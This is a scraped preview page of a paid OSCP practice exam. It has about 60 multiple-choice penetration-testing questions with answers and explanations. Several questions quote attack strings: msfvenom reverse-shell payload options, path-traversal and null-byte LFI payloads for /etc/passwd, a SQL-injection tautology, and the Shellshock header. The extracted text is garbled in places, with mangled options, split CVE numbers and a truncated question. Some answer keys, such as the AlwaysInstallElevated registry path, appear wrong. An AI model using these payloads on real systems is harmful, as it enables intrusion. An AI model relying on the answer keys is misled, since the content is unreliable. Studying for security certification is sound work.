PrepIQ Offensive Security Certified OSCP Ultimate Exam, Exams of Technology

Prepare for OSCP certification topics including penetration testing methodologies, enumeration, exploitation, privilege escalation, pivoting, and reporting practices.

Typology: Exams

2025/2026

Available from 06/03/2026

shilpi-jain-3
shilpi-jain-3 🇮🇳

2.5

(11)

80K documents

1 / 50

Toggle sidebar

This page cannot be seen from the preview

Don't miss anything!

bg1
PrepIQ Offensive Security Certified OSCP
Ultimate Exam
**Question 1.** Which Nmap NSE script is most appropriate for enumerating SMB
shares on a target?
A) http-enum
B) smb-enum-shares
C) ssl-cert
D) dns-brute
**Answer:** B
**Explanation:** The `smb-enum-shares` NSE script specifically queries SMB
services to list available shares, making it ideal for SMB enumeration.
**Question 2.** When performing passive DNS enumeration, which technique can
reveal subdomains without contacting the target server?
A) Zone transfer request
B) DNS brute-forcing
C) Querying public certificate transparency logs
D) Sending a SYN scan to port 53
**Answer:** C
**Explanation:** Certificate Transparency logs contain domain names and
subdomains that have been issued certificates, allowing passive discovery without
direct interaction with the target.
**Question 3.** In OSCP labs, which tool is prohibited for automated exploitation of
web applications?
A) Gobuster
B) sqlmap
C) Nmap
D) Netcat
**Answer:** B
**Explanation:** The OSCP exam rules restrict the use of automated web
exploitation tools like sqlmap; manual exploitation is required.
pf3
pf4
pf5
pf8
pf9
pfa
pfd
pfe
pff
pf12
pf13
pf14
pf15
pf16
pf17
pf18
pf19
pf1a
pf1b
pf1c
pf1d
pf1e
pf1f
pf20
pf21
pf22
pf23
pf24
pf25
pf26
pf27
pf28
pf29
pf2a
pf2b
pf2c
pf2d
pf2e
pf2f
pf30
pf31
pf32

Partial preview of the text

Download PrepIQ Offensive Security Certified OSCP Ultimate Exam and more Exams Technology in PDF only on Docsity!

Ultimate Exam

Question 1. Which Nmap NSE script is most appropriate for enumerating SMB shares on a target? A) http-enum B) smb-enum-shares C) ssl-cert D) dns-brute Answer: B Explanation: The smb-enum-shares NSE script specifically queries SMB services to list available shares, making it ideal for SMB enumeration. Question 2. When performing passive DNS enumeration, which technique can reveal subdomains without contacting the target server? A) Zone transfer request B) DNS brute-forcing C) Querying public certificate transparency logs D) Sending a SYN scan to port 53 Answer: C Explanation: Certificate Transparency logs contain domain names and subdomains that have been issued certificates, allowing passive discovery without direct interaction with the target. Question 3. In OSCP labs, which tool is prohibited for automated exploitation of web applications? A) Gobuster B) sqlmap C) Nmap D) Netcat Answer: B Explanation: The OSCP exam rules restrict the use of automated web exploitation tools like sqlmap; manual exploitation is required.

Ultimate Exam

Question 4. Which HTTP status code typically indicates that a directory listing is enabled on a web server? A) 200 OK B) 403 Forbidden C) 404 Not Found D) 401 Unauthorized Answer: A Explanation: A 200 OK response with an HTML page showing the directory contents confirms that directory listing is enabled. Question 5. Which of the following is a reliable indicator of a reflected XSS vulnerability? A) Input is stored in a database and later displayed. B) The payload appears unchanged in the URL after submission. C) The server returns a 500 Internal Server Error. D) The application uses prepared statements. Answer: B Explanation: Reflected XSS reflects user-supplied input directly back in the response, often visible unchanged in the URL query string. Question 6. Which option for msfvenom creates a Windows Meterpreter reverse TCP payload with an .exe format? A) -p windows/meterpreter/reverse_tcp -f exe -o shell.exe B) -p linux/x86/meterpreter_reverse_tcp -f elf -o shell.elf C) -p java/meterpreter/reverse_tcp -f jar -o shell.jar D) -p php/meterpreter_reverse_tcp -f raw -o shell.php Answer: A Explanation: The windows/meterpreter/reverse_tcp payload with -f exe creates a Windows executable Meterpreter reverse shell.

Ultimate Exam

Question 10. Which PowerShell cmdlet can be used to enumerate local user accounts on a Windows machine? A) Get-ADUser B) net user C) Get-LocalUser D) whoami /all Answer: C Explanation: Get-LocalUser (available in PowerShell 5.1+) lists local user accounts without requiring AD tools. Question 11. When exploiting a vulnerable LFI, which technique allows you to read /etc/passwd on a Linux web server? A) ../../../../etc/passwd B) ?file=../../../../etc/passwd%00 C) ?page=login.php D) ?id=1 UNION SELECT Answer: B Explanation: Adding a null byte (%00) terminates the string, bypassing any file extension checks and allowing the server to read /etc/passwd. Question 12. Which of the following is a typical sign of a successful Kerberoasting attack? A) Obtaining a clear-text password for a domain admin. B) Capturing a TGT ticket for a service account. C) Extracting a service ticket (TGS) that can be cracked offline. D) Receiving a golden ticket from the KRBTGT account. Answer: C Explanation: Kerberoasting involves requesting service tickets (TGS) for service accounts; these tickets are then cracked offline to recover the service account password.

Ultimate Exam

Question 13. In the context of OSCP, which command is used to perform a TCP SYN scan on the top 1000 ports? A) nmap -sT -p- target.com B) nmap -sS target.com C) nmap -sU target.com D) nmap -sA target.com Answer: B Explanation: -sS initiates a stealth SYN scan, and by default scans the top 1000 most common ports. Question 14. Which of the following is the most reliable method to bypass a basic authentication dialog using Burp Suite? A) Intercept and modify the Authorization header with a base64-encoded username:password. B) Change the request method from GET to POST. C) Disable SSL verification. D) Use the Repeater to change the URL path. Answer: A Explanation: Basic authentication uses the Authorization header; modifying it with a correctly base64-encoded credential bypasses the prompt. Question 15. Which Linux kernel vulnerability is commonly exploited for local privilege escalation on kernels older than 4.4.0? A) Dirty COW (CVE- 2016 - 5195) B) Heartbleed (CVE- 2014 - 0160) C) Shellshock (CVE- 2014 - 6271) D) Spectre (CVE- 2017 - 5753) Answer: A Explanation: Dirty COW is a race condition in the copy-on-write mechanism that allows unprivileged users to write to read-only memory, leading to root escalation on affected kernels.

Ultimate Exam

Question 19. Which of the following is a sign that a web application is vulnerable to SQL injection? A) The page returns a 403 Forbidden error. B) The URL contains a parameter that, when appended with ' OR '1'='1, returns additional rows. C) The server logs show a 404 error. D) The application uses HTTPS. Answer: B Explanation: Adding a tautology like ' OR '1'='1 that changes the query logic and returns more data indicates a SQL injection point. Question 20. Which Metasploit auxiliary module can be used to perform a SMB null session enumeration? A) auxiliary/scanner/smb/smb_version B) auxiliary/scanner/smb/smb_enumusers C) auxiliary/scanner/smb/smb_null_session D) auxiliary/scanner/ssh/ssh_login Answer: C Explanation: The smb_null_session module attempts to connect to SMB without credentials and can enumerate shares, users, and policies. Question 21. What is the primary purpose of the searchsploit command in OSCP labs? A) To scan open ports. B) To locate public exploits matching a keyword. C) To generate payloads. D) To enumerate Active Directory objects. Answer: B Explanation: searchsploit queries the Exploit-DB offline database for exploits related to a given keyword or CVE.

Ultimate Exam

Question 22. Which flag in gcc is used to compile a 32-bit binary on a 64-bit system? A) -m B) -m C) -march=i D) -static Answer: B Explanation: -m32 tells GCC to generate 32-bit code, useful when exploiting 32 - bit binaries on a 64-bit host. Question 23. In a Windows environment, which registry key controls the AlwaysInstallElevated policy? A) HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System B) HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Installer C) HKCU\Software\Microsoft\Windows\CurrentVersion\Run D) HKLM\System\CurrentControlSet\Services\LanmanServer Answer: B Explanation: The AlwaysInstallElevated policy resides under HKLM\Software\ Microsoft\Windows\CurrentVersion\Policies\Installer; enabling it allows MSI packages to install with elevated privileges. Question 24. Which Nmap script can be used to brute-force SNMP community strings? A) snmp-brute B) snmp-info C) snmp-sysdescr D) snmp-get-next Answer: A Explanation: The snmp-brute NSE script attempts common community strings to discover valid SNMP credentials.

Ultimate Exam

Question 28. In the context of OSCP, which of the following is a valid reason to use a “reverse shell” rather than a “bind shell”? A) Reverse shells are easier to detect. B) Reverse shells work better when the target is behind a firewall that blocks inbound connections. C) Bind shells require elevated privileges. D) Reverse shells do not need a listener on the attacker’s machine. Answer: B Explanation: A reverse shell initiates a connection from the target to the attacker, bypassing inbound firewall rules that would block a bind shell. Question 29. Which PowerShell command can be used to retrieve the list of services that run with the “Local System” account? A) Get-Service | Where-Object {$_.StartType -eq "Automatic"} B) Get-WmiObject Win32_Service | Where-Object {$_.StartName -eq "LocalSystem"} C) net start D) sc queryex type= service Answer: B Explanation: The Win32_Service WMI class includes a StartName property; filtering for "LocalSystem" reveals services running as SYSTEM. Question 30. Which of the following is a common indicator that a Linux binary is compiled with Position Independent Executable (PIE) enabled? A) The binary has the setuid bit set. B) readelf -h shows “Type: DYN”. C) The file size is exactly 4096 bytes. D) It contains the string “/bin/sh”. Answer: B Explanation: PIE binaries are of ELF type DYN (shared object) rather than EXEC, allowing address randomization.

Ultimate Exam

Question 31. Which technique can be used to extract password hashes from the SAM file on a Windows system without administrative privileges? A) Use reg save to dump the SAM hive. B) Access the file directly via \\C$\\Windows\\System32\\config\\SAM. C) Use pwdump after obtaining SYSTEM. D) It is not possible without elevation. Answer: D Explanation: The SAM hive is protected; without administrative (SYSTEM) rights, it cannot be read or saved. Question 32. Which of the following is the primary purpose of the BloodHound tool in AD environments? A) Password cracking. B) Visualizing relationships and attack paths in Active Directory. C) Performing brute-force attacks against Kerberos. D) Enumerating open ports. Answer: B Explanation: BloodHound ingests AD data and builds graphs that reveal privilege escalation and lateral movement paths. Question 33. Which flag in sqlmap forces the tool to use a POST request instead of GET? A) --method=POST B) -p C) --data D) --batch Answer: A Explanation: The --method=POST option tells sqlmap to send the payload using the HTTP POST method.

Ultimate Exam

Question 37. Which of the following is a typical first step when attempting to exploit a Windows service with an unquoted path? A) Create a malicious executable named after the first directory in the path. B) Modify the service registry entry to point to a new binary. C) Restart the service manually. D) Dump the service’s memory. Answer: A Explanation: By placing a malicious executable with the same name as the first directory component, Windows will execute it due to the unquoted path ambiguity. Question 38. Which of the following Nmap scripts can be used to detect the presence of a Heartbleed vulnerability? A) ssl-heartbleed B) tls-nextprotoneg C) http-vuln-cve2015- D) ssh-hostkey Answer: A Explanation: The ssl-heartbleed NSE script tests for the OpenSSL Heartbeat vulnerability. Question 39. When exploiting a web application with a file upload feature, which of the following file types is most likely to bypass naive validation? A) image.jpg with a PHP payload embedded after a null byte. B) document.pdf containing a macro. C) script.js with harmless code. D) archive.zip containing a text file. Answer: A Explanation: Many upload filters only check the file extension; appending a null byte (%00) can truncate the check, allowing a PHP payload to be interpreted. Question 40. Which Linux command can be used to list all scheduled cron jobs for the current user?

Ultimate Exam

A) crontab -l B) ls -l /etc/cron.* C) systemctl list-timers D) at -l Answer: A Explanation: crontab -l displays the current user’s cron entries. Question 41. Which of the following is a characteristic of a “blind” SQL injection? A) The application returns database errors directly. B) The attacker does not see the query output, only boolean or time-based responses. C) The injection occurs in a hidden form field. D) It only works on NoSQL databases. Answer: B Explanation: Blind SQLi relies on indirect cues (true/false or delays) because the application does not display query results. Question 42. Which of the following is the most effective way to identify a vulnerable version of sudo on a Linux host? A) sudo -V B) apt list --installed | grep sudo C) sudo -l D) dpkg -s sudo Answer: D Explanation: dpkg -s sudo (or rpm -q sudo) reveals the installed package version, which can be compared against known vulnerable releases. Question 43. Which of the following techniques can be used to achieve privilege escalation on a Windows system that has a vulnerable version of PrintNightmare? A) Exploit the vulnerable Print Spooler service to write a malicious DLL to the system directory.

Ultimate Exam

C) Get-ADUser -Properties msDS-AllowedToDelegateTo D) whoami /all Answer: B Explanation: klist (available in Windows) displays the current Kerberos tickets for the logged-in user. Question 47. Which of the following is the best way to identify if a Linux binary is compiled with stack canaries enabled? A) readelf -s binary | grep __stack_chk_fail B) strings binary | grep canary C) file binary D) ldd binary Answer: A Explanation: Presence of the __stack_chk_fail symbol indicates that stack canaries are compiled into the binary. Question 48. Which of the following is a common method to bypass a web application login form that uses basic authentication? A) Use a valid JWT token. B) Submit credentials in the Authorization header. C) Inject JavaScript into the password field. D) Change the request method to HEAD. Answer: B Explanation: Basic authentication relies on the Authorization header; providing valid base64-encoded credentials bypasses the login prompt. Question 49. When performing enumeration of a Linux system, which command can reveal SUID binaries that are owned by root? A) find / -perm -4000 -type f 2>/dev/null B) ls -l /usr/bin C) cat /etc/passwd

Ultimate Exam

D) chmod +s /tmp/file Answer: A Explanation: The -4000 permission flag selects files with the SUID bit set; filtering for root ownership helps identify privilege-escalation candidates. Question 50. Which of the following is a typical sign that a target is vulnerable to the “Shellshock” Bash bug? A) The server returns “500 Internal Server Error” when a crafted HTTP header containing () { :;}; is sent. B) The server refuses all SSH connections. C) The web page contains the string “”. D) The DNS server returns NXDOMAIN for all queries. Answer: A Explanation: The Shellshock vulnerability is triggered by environment variables (often via HTTP headers) starting with () { :;};. A server error indicates the payload was processed. Question 51. Which of the following Windows commands can be used to list all local administrator accounts? A) net localgroup Administrators B) whoami /groups C) net user D) gpresult /r Answer: A Explanation: net localgroup Administrators displays the members of the local Administrators group. Question 52. Which Nmap script can be used to enumerate SMB users on a target? A) smb-enum-users B) smb-os-discovery C) smb-protocols

Ultimate Exam

D) Generate Metasploit payloads. Answer: A Explanation: enum4linux gathers information from Windows systems via SMB, including users, groups, shares, and policies. Question 56. In a Windows environment, which attribute in Active Directory stores the password hash of a user? A) sAMAccountName B) userPassword C) unicodePwd D) objectSid Answer: C Explanation: The unicodePwd attribute holds the (hashed) password for a user object; it is stored as a Unicode-encoded value. Question 57. Which of the following is a common method to exploit a vulnerable cron job that executes a script from /tmp with root privileges? A) Replace the script in /tmp with a malicious one. B) Delete the cron entry. C) Change the script’s permissions to 600. D) Restart the cron service. Answer: A Explanation: If the cron job runs a script located in a writable directory like /tmp, an attacker can replace it with malicious code that runs as root. Question 58. Which option for msfvenom creates a Linux ELF reverse shell that is statically linked? A) -f elf -p linux/x86/meterpreter/reverse_tcp -b "\x00" B) -f elf -p linux/x86/shell_reverse_tcp -e x86/shikata_ga_nai -i 5 C) -f elf -p linux/x86/meterpreter_reverse_tcp -a x86 --platform Linux D) -f elf -p linux/x86/shell_reverse_tcp -b "\x00"

Ultimate Exam

Answer: D Explanation: The linux/x86/shell_reverse_tcp payload is a simple reverse shell; adding -b "\x00" avoids null bytes, and the resulting ELF is typically statically linked. Question 59. Which of the following is the most reliable way to verify that a web server is vulnerable to directory traversal? A) Request /../../../../etc/passwd and check for the presence of “root:x”. B) Scan the server with Nmap. C) Perform a DNS zone transfer. D) Use whois on the IP address. Answer: A Explanation: Accessing a known file via traversal and confirming its contents (e.g., /etc/passwd) directly demonstrates the vulnerability. Question 60. Which of the following Windows commands can be used to query the local security policy for the “AlwaysInstallElevated” setting? A) secpol.msc B) reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Installer /v AlwaysInstallElevated C) gpresult /r D) net accounts Answer: B Explanation: The registry key under HKLM\Software\Microsoft\Windows\ CurrentVersion\Policies\Installer stores the AlwaysInstallElevated value. Question 61. Which of the following is the most effective way to enumerate LDAP information from a Windows domain controller without credentials? A) Anonymous bind to LDAP using ldapsearch -x -h dc.example.com -b "" "(objectclass=*)" B) Use net view on the domain controller. C) Perform a TCP SYN scan on port 389.